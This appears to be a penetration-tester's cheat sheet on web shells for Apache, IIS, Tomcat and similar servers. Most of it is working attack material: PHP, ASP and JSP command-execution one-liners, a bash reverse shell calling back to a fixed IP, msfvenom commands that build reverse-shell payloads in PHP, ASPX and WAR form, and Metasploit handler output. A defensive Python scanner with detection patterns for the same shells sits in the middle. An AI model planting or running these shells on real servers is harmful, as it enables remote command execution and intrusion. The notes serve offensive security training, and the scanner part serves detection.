Web Shell

References

Bind and Reverse Shell (Shell / Reverse Shell)

Tools

Onelin3r

pip install one-lin3r

LazyShell

Webroot

| Web Server | Default Webroot |
| --- | --- |
| Apache | /var/www/html/ |
| Nginx | /usr/local/nginx/html/ |
| IIS | c:\inetpub\wwwroot\ |
| XAMPP | C:\xampp\htdocs\ |

Custom shells

PHP

Linux

<?php system($_REQUEST['cmd']); ?>
http://SERVER_IP:PORT/uploads/shell.php?cmd=id

Windows

<?php echo exec($_GET["cmd"]);?>

Reverse shell - Linux

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.2/1234 0>&1'"); ?>

ASP

<% eval request("cmd") %>

With msfvenom

msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php

SecLists Webshells

ls /opt/seclists/Web-Shells/        
backdoor_list.txt  CFM  FuzzDB  JSP  laudanum-1.0  Magento  PHP  Vtiger  WordPress

Laudanum repo

cp /opt/seclists/Web-Shells/laudanum-1.0/aspx/shell.aspx .
  • Modify the shell for use

PHP

[Apr 08, 2024 - 03:50:25 (EDT)] exegol-CPTS /workspace # locate cmd.php
/opt/seclists/Web-Shells/FuzzDB/cmd.php

[Apr 08, 2024 - 03:51:51 (EDT)] exegol-CPTS /workspace # locate shell.php 
/opt/seclists/Web-Shells/PHP/another-obfuscated-phpshell.php
/opt/seclists/Web-Shells/PHP/obfuscated-phpshell.php
/opt/seclists/Web-Shells/WordPress/plugin-shell.php
/opt/seclists/Web-Shells/laudanum-1.0/php/php-reverse-shell.php
/opt/seclists/Web-Shells/laudanum-1.0/php/shell.php
/opt/seclists/Web-Shells/laudanum-1.0/wordpress/templates/php-reverse-shell.php
/opt/seclists/Web-Shells/laudanum-1.0/wordpress/templates/shell.php

<?php system($_REQUEST["cmd"]); ?>

echo '<?php system($_REQUEST["cmd"]); ?>' > /var/www/html/shell.php

?cmd=id

curl http://SERVER_IP:PORT/shell.php?cmd=id

p0wny shell

Automates bypassing PHP function restrictions (such as system, etc.)

Works on Linux and Windows

PHPBash

wwwolf's PHP web shell

PentestMonkey - Reverse shell

JSP

[Apr 08, 2024 - 03:50:32 (EDT)] exegol-CPTS /workspace # locate cmd.jsp
/opt/seclists/Web-Shells/FuzzDB/cmd.jsp
/opt/seclists/Web-Shells/laudanum-1.0/jsp/warfiles/cmd.jsp
/opt/tools/SSRFmap/data/cmd.jsp
/opt/tools/clusterd/src/lib/resources/cmd.jsp

[Apr 08, 2024 - 03:52:01 (EDT)] exegol-CPTS /workspace # locate shell.jsp
/opt/seclists/Web-Shells/JSP/simple-shell.jsp

<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>

ASP

[Apr 08, 2024 - 03:51:48 (EDT)] exegol-CPTS /workspace # locate shell.asp 
/opt/seclists/Web-Shells/laudanum-1.0/asp/shell.asp

<% eval request("cmd") %>
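
The PHP, JSP and ASP one-liners above share one shape: a request parameter handed directly to an execution sink. The following is an added example, not part of the original page: a defender-side scan of a webroot for that shape. The rule names, regexes and sample file names are assumptions of this example and cover only the forms shown on this page.

```python
import re, tempfile
from pathlib import Path

# Assumed rule set: request input passed straight to an execution sink, limited
# to the PHP, JSP and classic ASP forms listed on this page (rule names made up).
RULES = {
    "php-request-exec": re.compile(
        r"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*"
        r"\$_(?:REQUEST|GET|POST|COOKIE)\b", re.I),
    "bash-dev-tcp": re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+"),
    "jsp-runtime-exec": re.compile(
        r"Runtime\s*\.\s*getRuntime\s*\(\s*\)\s*\.\s*exec\s*\(\s*"
        r"request\s*\.\s*getParameter", re.I),
    "asp-eval-request": re.compile(r"<%\s*(?:eval|execute)\s*\(?\s*request\b", re.I),
}
SCRIPT_EXT = {".php", ".phtml", ".jsp", ".jspx", ".asp", ".aspx"}

# Constructed sample files: one-liners from this page plus one benign script.
SAMPLES = {
    "uploads/shell.php": "<?php system($_REQUEST['cmd']); ?>",
    "uploads/rev.php": "<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.2/1234 0>&1'\"); ?>",
    "cmd.jsp": '<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>',
    "search.php": '<?php echo htmlspecialchars($_GET["q"]); ?>',
}

def scan_text(text):
    """Return the sorted names of all rules that match the file content."""
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def scan_webroot(root):
    """Return {relative path: [rule names]} for server-side scripts that match."""
    hits, base = {}, Path(root)
    for path in sorted(base.rglob("*")):
        if path.is_file() and path.suffix.lower() in SCRIPT_EXT:
            found = scan_text(path.read_text(errors="replace"))
            if found:
                hits[path.relative_to(base).as_posix()] = found
    return hits

def demo():
    # Write the constructed samples into a temporary webroot and scan it.
    with tempfile.TemporaryDirectory() as root:
        for rel, body in SAMPLES.items():
            target = Path(root, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body)
        return scan_webroot(root)

if __name__ == "__main__":
    for rel, rules in demo().items():
        print(f"{rel}: {', '.join(rules)}")
```

To scan a real server, call scan_webroot() on one of the default webroots listed earlier. Plain pattern matching will not flag obfuscated shells, so pair it with file-integrity monitoring of the webroot.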

ASPX

[Apr 08, 2024 - 03:49:48 (EDT)] exegol-CPTS /workspace # locate cmd.aspx
/opt/seclists/Web-Shells/FuzzDB/cmd.aspx

[Apr 08, 2024 - 03:51:08 (EDT)] exegol-CPTS /workspace # locate shell.aspx
/opt/seclists/Web-Shells/laudanum-1.0/aspx/shell.aspx

Metasploit

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=1337 -f aspx > reverse_shell.aspx

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of aspx file: 2819 bytes

msf6 exploit(multi/handler) > set LHOST 10.10.14.5
LHOST => 10.10.14.5
msf6 exploit(multi/handler) > set LPORT 1337
LPORT => 1337
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.5:1337

Antak WebShell

Modify the shell for use

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.1.5 LPORT=443 -f war > shell.war
msfvenom -p java/shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LPORT> -f war -o revshell.war

msf6 exploit(multi/handler)

Tomcat (8080)

Shell ++

TTY Upgrade
